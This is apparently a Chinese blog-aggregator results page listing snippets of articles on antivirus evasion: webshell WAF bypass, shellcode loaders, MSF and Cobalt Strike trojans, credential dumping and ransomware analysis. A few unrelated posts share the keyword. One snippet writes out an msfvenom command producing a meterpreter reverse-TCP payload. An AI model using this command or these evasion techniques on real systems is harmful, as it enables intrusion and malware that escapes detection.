veil免杀第7页

远控免杀学习笔记-msfvenom工具介绍（二）

目录目录监听参数防⽌假session防⽌session意外退出handler后台持续监听payload的可持续化各平台payload⽣成⼆进制windowsLinuxMacAndroidPowershellNetcatShellcode基于Linux的Shellcode基于Windows的Shellcode基于Mac的Shellcode脚本Python反弹shellPython正向shellBas

仲瑿·2023-04-06 15:59

美美画风的绘本《Susine et le Dorméveil》分享

遇到这本书时就爱不释手，很喜欢的画风，然后就想学习到手，很有趣有神器的故事，也是我正在儿童插画的开始，大爱！其实里面的情节不是这样的，是临摹了几张后，有感而发，设计了一个小情节，画的很开心图片发自App图片发自App图片发自App图片发自App图片发自App

净胡画·2023-04-05 22:06

记一次weblogic反序列化到内网域控上线

命令执行，这里想到了三种上线法子，上传webshell、powershell上线、frp免杀上远程桌

pikeboom·2023-04-05 18:06

《伯罗奔尼撒战争史》与《战国策》札记（三十一）

秦孝公封商君，孝公死，而后不免杀之。秦惠王封冉子，惠王死，而后王夺之。公孙鞅，功臣也；冉子，亲姻也。然而不免夺死者，封近故也。太公望封于齐，邵公奭封于燕，为其远王室矣。

刘子曰_b08e·2023-04-05 03:15

JSP webshell免杀——JSP的基础

唉，每次开启JSP都要好一会儿。话说我也不知道为啥，我的每次开启条件一次比一次苛刻。一开始必应就可以打开，再后来只能由谷歌打开，现在可好了得开着代理用谷歌才能进去。一个JSP页面可由5种元素组合而成(1)普通的HTML标记和JavaScript标记，CSS。(2)JSP标记，如指令标记、动作标记。标记符号之间声明变量，定义方法以及定义类。标记符号的内容习惯上放在JSP页面指令之后，之前，也可以写在

正在过坎·2023-04-04 05:33

JSP webshell免杀——webshell免杀

结果我免杀跟着学的视频就是这位大佬的。更离谱的是，聪哥说我们是见过许少的，就是上次给红队整理报告的时候，他就在。果然，实习就是好，传说中的大佬们就在身边——虽然我都不认识，但是还是感觉好厉害。

正在过坎·2023-04-04 05:33

人活着就有意义

人活着就有意义每个人都有存在的价值和意义河流的意义生的愿力，万物众生皆在道里哪怕一只鸡鸭，一条鱼，虾，一只猪，一头牛“今天吞噬您的力量，同样有更强大的无形力量回吃自身，能化解便化解，能不杀便不杀，若不到非杀不可的时候…”国外开始推行对死刑犯“免杀

南溪向南北歌流海·2023-04-04 02:06

IDS反病毒与APT的具体介绍

4.恶意软件的免杀技术有哪些？5.反病毒技术有哪些？6.反病毒网关的工作原理是什

鸥神仙·2023-04-01 18:10

河马php一句话木马,一句话木马的套路

0x01前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧。

男爵兔·2023-04-01 13:31

sqlmap绕过d盾_WEBSHELL免杀绕过WAF思路&方法（一）

本文主要介绍WEBSHELL免杀绕过的思路与方法，网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀，所以我们要了解我们主要对手WAF的检测技术，故基于前人优秀基础上我们需要有能力衍生出免杀马，WEBSHELL

weixin_39599830·2023-04-01 13:58

渗透自学（一）基础知识

DNS缓存投毒：解析恶意地址脚本语言类型：javaweb（适合中大网站）、.php（适合小网站）、.asp、aspx、.jsp、.pl、.py、.cgi（国外常用）后门：webshell，文件上传、更改免杀

ecnOXong·2023-04-01 13:41

45_webshell绕waf

webshell绕waf两种方式:对webshell所在文件进行扫描静态文件查杀当连接webshell时安全狗会对连接的通讯包进行扫描流量查杀一、webshell编写我们之前在应急响应的时候学过webshll免杀的生成

Beilay()·2023-04-01 13:02

webshell 常见 Bypass waf 技巧总结

在渗透学习的过程中，总会遇到各种情况，例如php大马被waf拦截的时候，那么如何制作免杀phpwebshell呢，接下来就由我带各位小伙伴们一起踏上大马免杀之路，不喜勿喷。

bandongshen9543·2023-04-01 12:18

[网络安全]第三次作业

4.恶意软件的免杀技术有哪些？5.反病毒技术有哪些？6.反病毒网关的工作原理是什么？7.反病毒网关的工作过程是什么？1.什么是APT？2.

君の名280·2023-04-01 01:22

远控免杀从入门到实践 (11) 终结篇

《远控免杀从入门到实践》系列文章目录：1、远控免杀从入门到实践(1)基础篇2、远控免杀从入门到实践(2)工具总结篇3、远控免杀从入门到实践(3)代码篇-C/C++4、远控免杀从入门到实践(4)代码篇-C

扶苏゜·2023-03-31 04:41

Exp3 免杀原理与实践

20155332《网络对抗》Exp3免杀原理与实践1.实验环境联想台式机一台，安装有win10系统，作为靶机进行实测安装的kali虚拟机，作为攻击机kali虚拟机安装有veil-evasion(听说安装过程比较复杂

weixin_33716941·2023-03-31 04:34

《网络攻防》实验三：免杀原理与实践

《网络攻防》实验三：免杀原理与实践世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒，编写该病毒的是一对巴基斯坦兄弟，两兄弟经营着一家电脑公司，以出售自己编制的电脑软件为生

weixin_33720956·2023-03-31 04:33

免杀技术

一、基础知识1.杀软是如何检测出恶意代码的？（1）检测特征码人有自己的特征，代码也有自己的特征。杀毒软件都有着一套特征库，依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。（2）启发式恶意软件检测如果该程序的特征和行为与病毒程序类似，其匹配程度达到一定值就可以认为该程序是病毒程序。（3）基于行为检测与启发式检测类似，只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程，如

weixin_30553837·2023-03-31 04:03

20144306《网络对抗》MAL_免杀原理与实践

一.基础问题回答1.杀软是如何检测出恶意代码的？（1）特征码：类似于人的生物特征，恶意代码可能会包含一段或多端数据能代表其特征。杀软一般会对文件内容进行静态扫描，将文件内容与特征库进行匹配，来检测已知的网络攻击。优点：检测效率高、能精确检测恶意软件类型和具体名称、能在恶意软件首次写入计算机时检测而非运行后。缺点：不能检测未知和变形的恶意软件、需频繁更新特征库、特征库会越来越臃肿。（2）启发式：就是

weixin_30505485·2023-03-31 04:33

远控免杀专题文章(1)-基础篇

前言一直是从事web安全多一些，对waf绕过还稍微有些研究，但是对远控免杀的认知还大约停留在ASPack、UPX加壳免杀的年代。

Ms08067安全实验室·2023-03-31 04:59

APT之木马静态免杀

前言这篇文章主要是记录手动编写代码进行木马免杀，使用工具也可以免杀，只不过太脚本小子了，而且工具的特征也容易被杀软抓到，指不定哪天就用不了了，所以要学一下手动去免杀木马，也方便以后开发一个只属于自己的木马关于使用工具免杀的教程

Ba1_Ma0·2023-03-31 04:57

【免杀前置课——shellcode】二十一、shellcode初步优化——通过跳板指令定位shellcode，解决程序随机基址无法跳转shellcode问题（详解）

shellcode初步优化通过跳板指令定位shellcode极其简化版shellcode_存在问题:```解析（重要）```第一个问题程序随机基址无法确定跳转shellcode位置第二个问题程序未正常退出通过跳板指令定位shellcode极其简化版shellcode_存在问题:1、利用x32dbg_工具查找的栈中shellcode起始地址，用该地址淹没返回地址，这个地址会经常发生变化，须找到一个能

webfker from 0 to 1·2023-03-31 03:15

MSF实战免杀过静态:ShellCode加花指令

分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的，无法通过导入表来调用系统的API函数，因此，这部分是一个通用的API调用函数，它可以根据给定的哈希值查找并调用相应的API。在查找API时，它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中非常重要，因为它可以让我们不用硬编码API函数地址，而是动态地查找和调用它们。;

Henry404s·2023-03-31 03:22

APT级全面免杀与企业纵深防御体系的红蓝对抗

一、CobaltStrike快速入门CobaltStrike:C/S架构的商业渗透软件，适合多人进行团队协作，可模拟APT做模拟对抗，进行内网渗透。CobaltStrike整体功能了解参考MITREATT&CK™CobaltStrike的C/S架构客户端(ClientGUI)团队成员使用的图形化界面服务器(TeamServer)控制-TeamServer是CobaltStrike中所有payloa

wespten·2023-03-29 11:46

【总结】防病毒网关---防毒墙

恶意代码的免杀技术免杀原理文件免杀原理改特征码免杀原理花指令免杀原理加壳免杀原理内存免杀原理行为免杀原理反病毒技术单机反病毒杀毒软件网关反病毒反病毒工作原理首包检

Born to be·2023-03-27 09:52

结合veillCS shellcode免杀(2020.1.13已过期)

一、CS生成shellcode攻击-生成后门-payloadgenerator-选veil二、安装veil安装dockerpullmattiasohlsson/veil启动dockerrun-it-v/

q1ya·2023-03-26 09:26

MSF--Powershell木马免杀测试过36和火

之前看了一篇对CS的Powershell木马进行Base64编码达到免杀效果，今天随便测试了一下MSF的Powershell木马免杀，两者虽然有些不同，但是方法还是大同小异的，Base64编码+修改变量名

LMcream·2023-03-25 16:45

萧何自污：大智若愚免杀身之祸

背景故事：萧何对刘邦的拥护之恩秦二世元年（公元前209年）七月，陈胜、吴广在大泽乡揭竿而起，举起了反秦的大旗，各地豪杰云集响应，天下大乱。而此时的萧何仍在沛县当功曹，他和曹参、樊哙、夏侯婴、周勃等人时常聚会，密切注视着局势的发展，并暗中与在芒砀山中的刘邦保持着联系。萧何萧何召集沛城父老共商大计。大家都推举刘邦为县令，背秦自立。刘邦却推辞道：“现今天下纷扰，诸侯并起，沛令一席自应选择全县最有声望之人

道不完的你·2023-03-20 23:02

免杀工具shellcodeloader

工具地址：shellcodeloader不想自己编译，就用工具作者自己编译的成品，realseMSF生成bin文件:msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=IPLPORT=port-fraw-o1.bin将生成好的木马1.bin拖入shellcodeloader中，并勾选所需配置，配置的选择原项目中介绍的很清楚，这里就不过多赘述了，点击

LMcream·2023-03-17 05:19

CobaltStrike二次开发环境准备以及免杀

文章目录前言一、环境二、过程1.注册Idea2.原版CobaltStrike3.开始反编译4.新建项目5.配置项目6.去除暗桩7.免杀CobaltStrike免杀其他免杀profilefile重写Stager

QQQqQqqqqrrrr·2023-03-12 12:27

NO_ACCESS Protection

NO_ACCESSProtection前言基本思路参考项目:前言这是原本开始是一位朋友研究后发现的一种对抗游戏外挂的思路，我看了一下发现其实可以扩散一下思路用于免杀对抗，说不定有意想不到的效果。

QQQqQqqqqrrrr·2023-03-12 12:27

Webshell_Generate 工具

且都已做了简单的免杀处理。免杀说明：jsp、jspx：争取将代码最

CSeroad·2023-02-07 04:39

Python免杀CS/MSF木马过36和火

今天测试了下Python免杀CS/MSF中Python格式的shellcode主要是巧用HEX编码即可，同之前的Base64编码免杀，不编译成EXE可过Defender。

LMcream·2023-02-03 10:46

msf生成免杀木马

一.杀软原理免杀概念免杀，也就是反病毒（AntiVirus）与反间谍（AntiSpyware）的对立面，英文为Anti-AntiVirus（简写VirusAV），逐字翻译为“反-反病毒”，翻译为“反杀毒技术

夜yesir·2023-02-03 00:53

MSF后门生成及免杀思想

MSF后门生成及免杀思想免杀概念杀毒软件检测方式杀毒软件主动防御免杀技术介绍修改特征码花指令免杀内存免杀加壳免杀二次编译资源修改MSF常用命令常见的木马生成常见后门生成方式编译软件VC++6.0免杀MSF

安澈521·2023-02-03 00:53

WebShell免杀之JSP ——yzddMr6

原文地址：https://yzddmr6.tk/posts/webshell-bypass-jsp/本文已授权悬剑武器库转载前言其他类型的webshell容易免杀的一个主要原因是有eval函数，能够把我们的加密几层后的

yzddMr6·2023-02-03 00:48

技术分享 | go语言源码免杀MSF木马

木马源码免杀两种形式：下载者和加载者https://www.freebuf.com/articles/system/227468.html前言加载者的免杀分为两部分:加载器本身的免杀，加载器源码因为在网上发布许久

天磊卫士官方·2023-01-10 18:21

【免杀前置课——Windows编程】十二、线程同步——一文讲懂什么是线程同步、原子操作函数、临界区、互斥体（激发态与非激发态区别）

线程同步线程同步多线程运行同一操作对象问题解决方案A:原子操作函数解决方案B:临界区解决方案C:互斥体激发态与非激发态互斥体优点:线程同步多线程运行同一操作对象问题#include#includeLONGg_count=0;DWORDWINAPImyThreadProc1(_In_LPVOIDlpParameter){for(size_ti=0;i<100000;i++){g_count++;}r

webfker from 0 to 1·2023-01-08 18:51

我的powershell免杀之路

我的powershell免杀之路原创tubai[花指令安全实验室](javascript:void(0)2021-07-0620:39WindowsPowerShell是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用

明月清风~~·2023-01-02 18:48

恶意软件免杀与技术(2022.04.25)

BlackGuard加密货币钱包窃取规避以下dll的加载SbieDll.dll沙盒沙盒SxIn.dll360全方位安全Sf2.dllAvast杀毒软件snxhk.dllAvast杀毒软件cmdvrt32.dllCOMODO网络安全使用Obfuscar进行.NET程序混淆BlackGuard还将查询“IP-Whois”以确定受害者的大致位置。在BlackGuard的一些样本中，此功能用于防止恶意软件

摔不死的笨鸟·2022-12-21 23:33

Conti勒索软件源代码分析

Conti勒索参数静态免杀反调试反HOOK字符串混淆指令混淆线程池加密算法加密性能重启系统安全模式加密参考链接参数Conti勒索软件v3版本的参数调用如下：参数功能-p指定加密路径-mLocalallnetbackups

摔不死的笨鸟·2022-12-21 23:33

内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具Windows凭证抓取1，procdump(官方工具无视免杀)（首选）procdump+mimikatz加载dmp文件，并导出其中的明文密码(procdump过杀软

西湖第一剑·2022-12-21 08:16

Metasploit实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段，而为了躲避杀毒软件的查杀，我们又不得不对木马进行免杀处理。

·2022-12-19 11:57

软件安全-UPX加壳

从而达到防修改与防反编译的效果，而因为源代码在磁盘中以压缩形式存储，虽然脱壳操作加重了CPU的负担，但减少了磁盘的读写，所以在大多数情况下还能提高程序运行速度；这种技术也常被应用到病毒免杀中，给病毒加壳后

写代码的小阿帆·2022-12-16 02:10

[免杀]基于python的uuid加载器

文章目录uuid字节转换uuid申请内存写入内存创建进程代码uuidUUID:通用唯一标识符(UniversallyUniqueIdentifier),对于所有的UUID它可以保证在空间和时间上的唯一性.它是通过MAC地址,时间戳,命名空间,随机数,伪随机数来保证生成ID的唯一性,有着固定的大小(128bit).它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID.UUID可以被用

3tefanie丶zhou·2022-12-10 07:03

[免杀]基于python的ipv4加载器

文章目录IPV4将shellcode字节转为Ipv4格式将Ipv4写入内存创建进程IPV4IPv4是一种无连接的协议，操作在使用分组交换的链路层（如以太网）上。此协议会尽最大努力交付数据包，意即它不保证任何数据包均能送达目的地，也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位（4字节）地址，因此地址空间中只有4,294,967,296个地址，格式如下：格式值从点分十进制转换点分十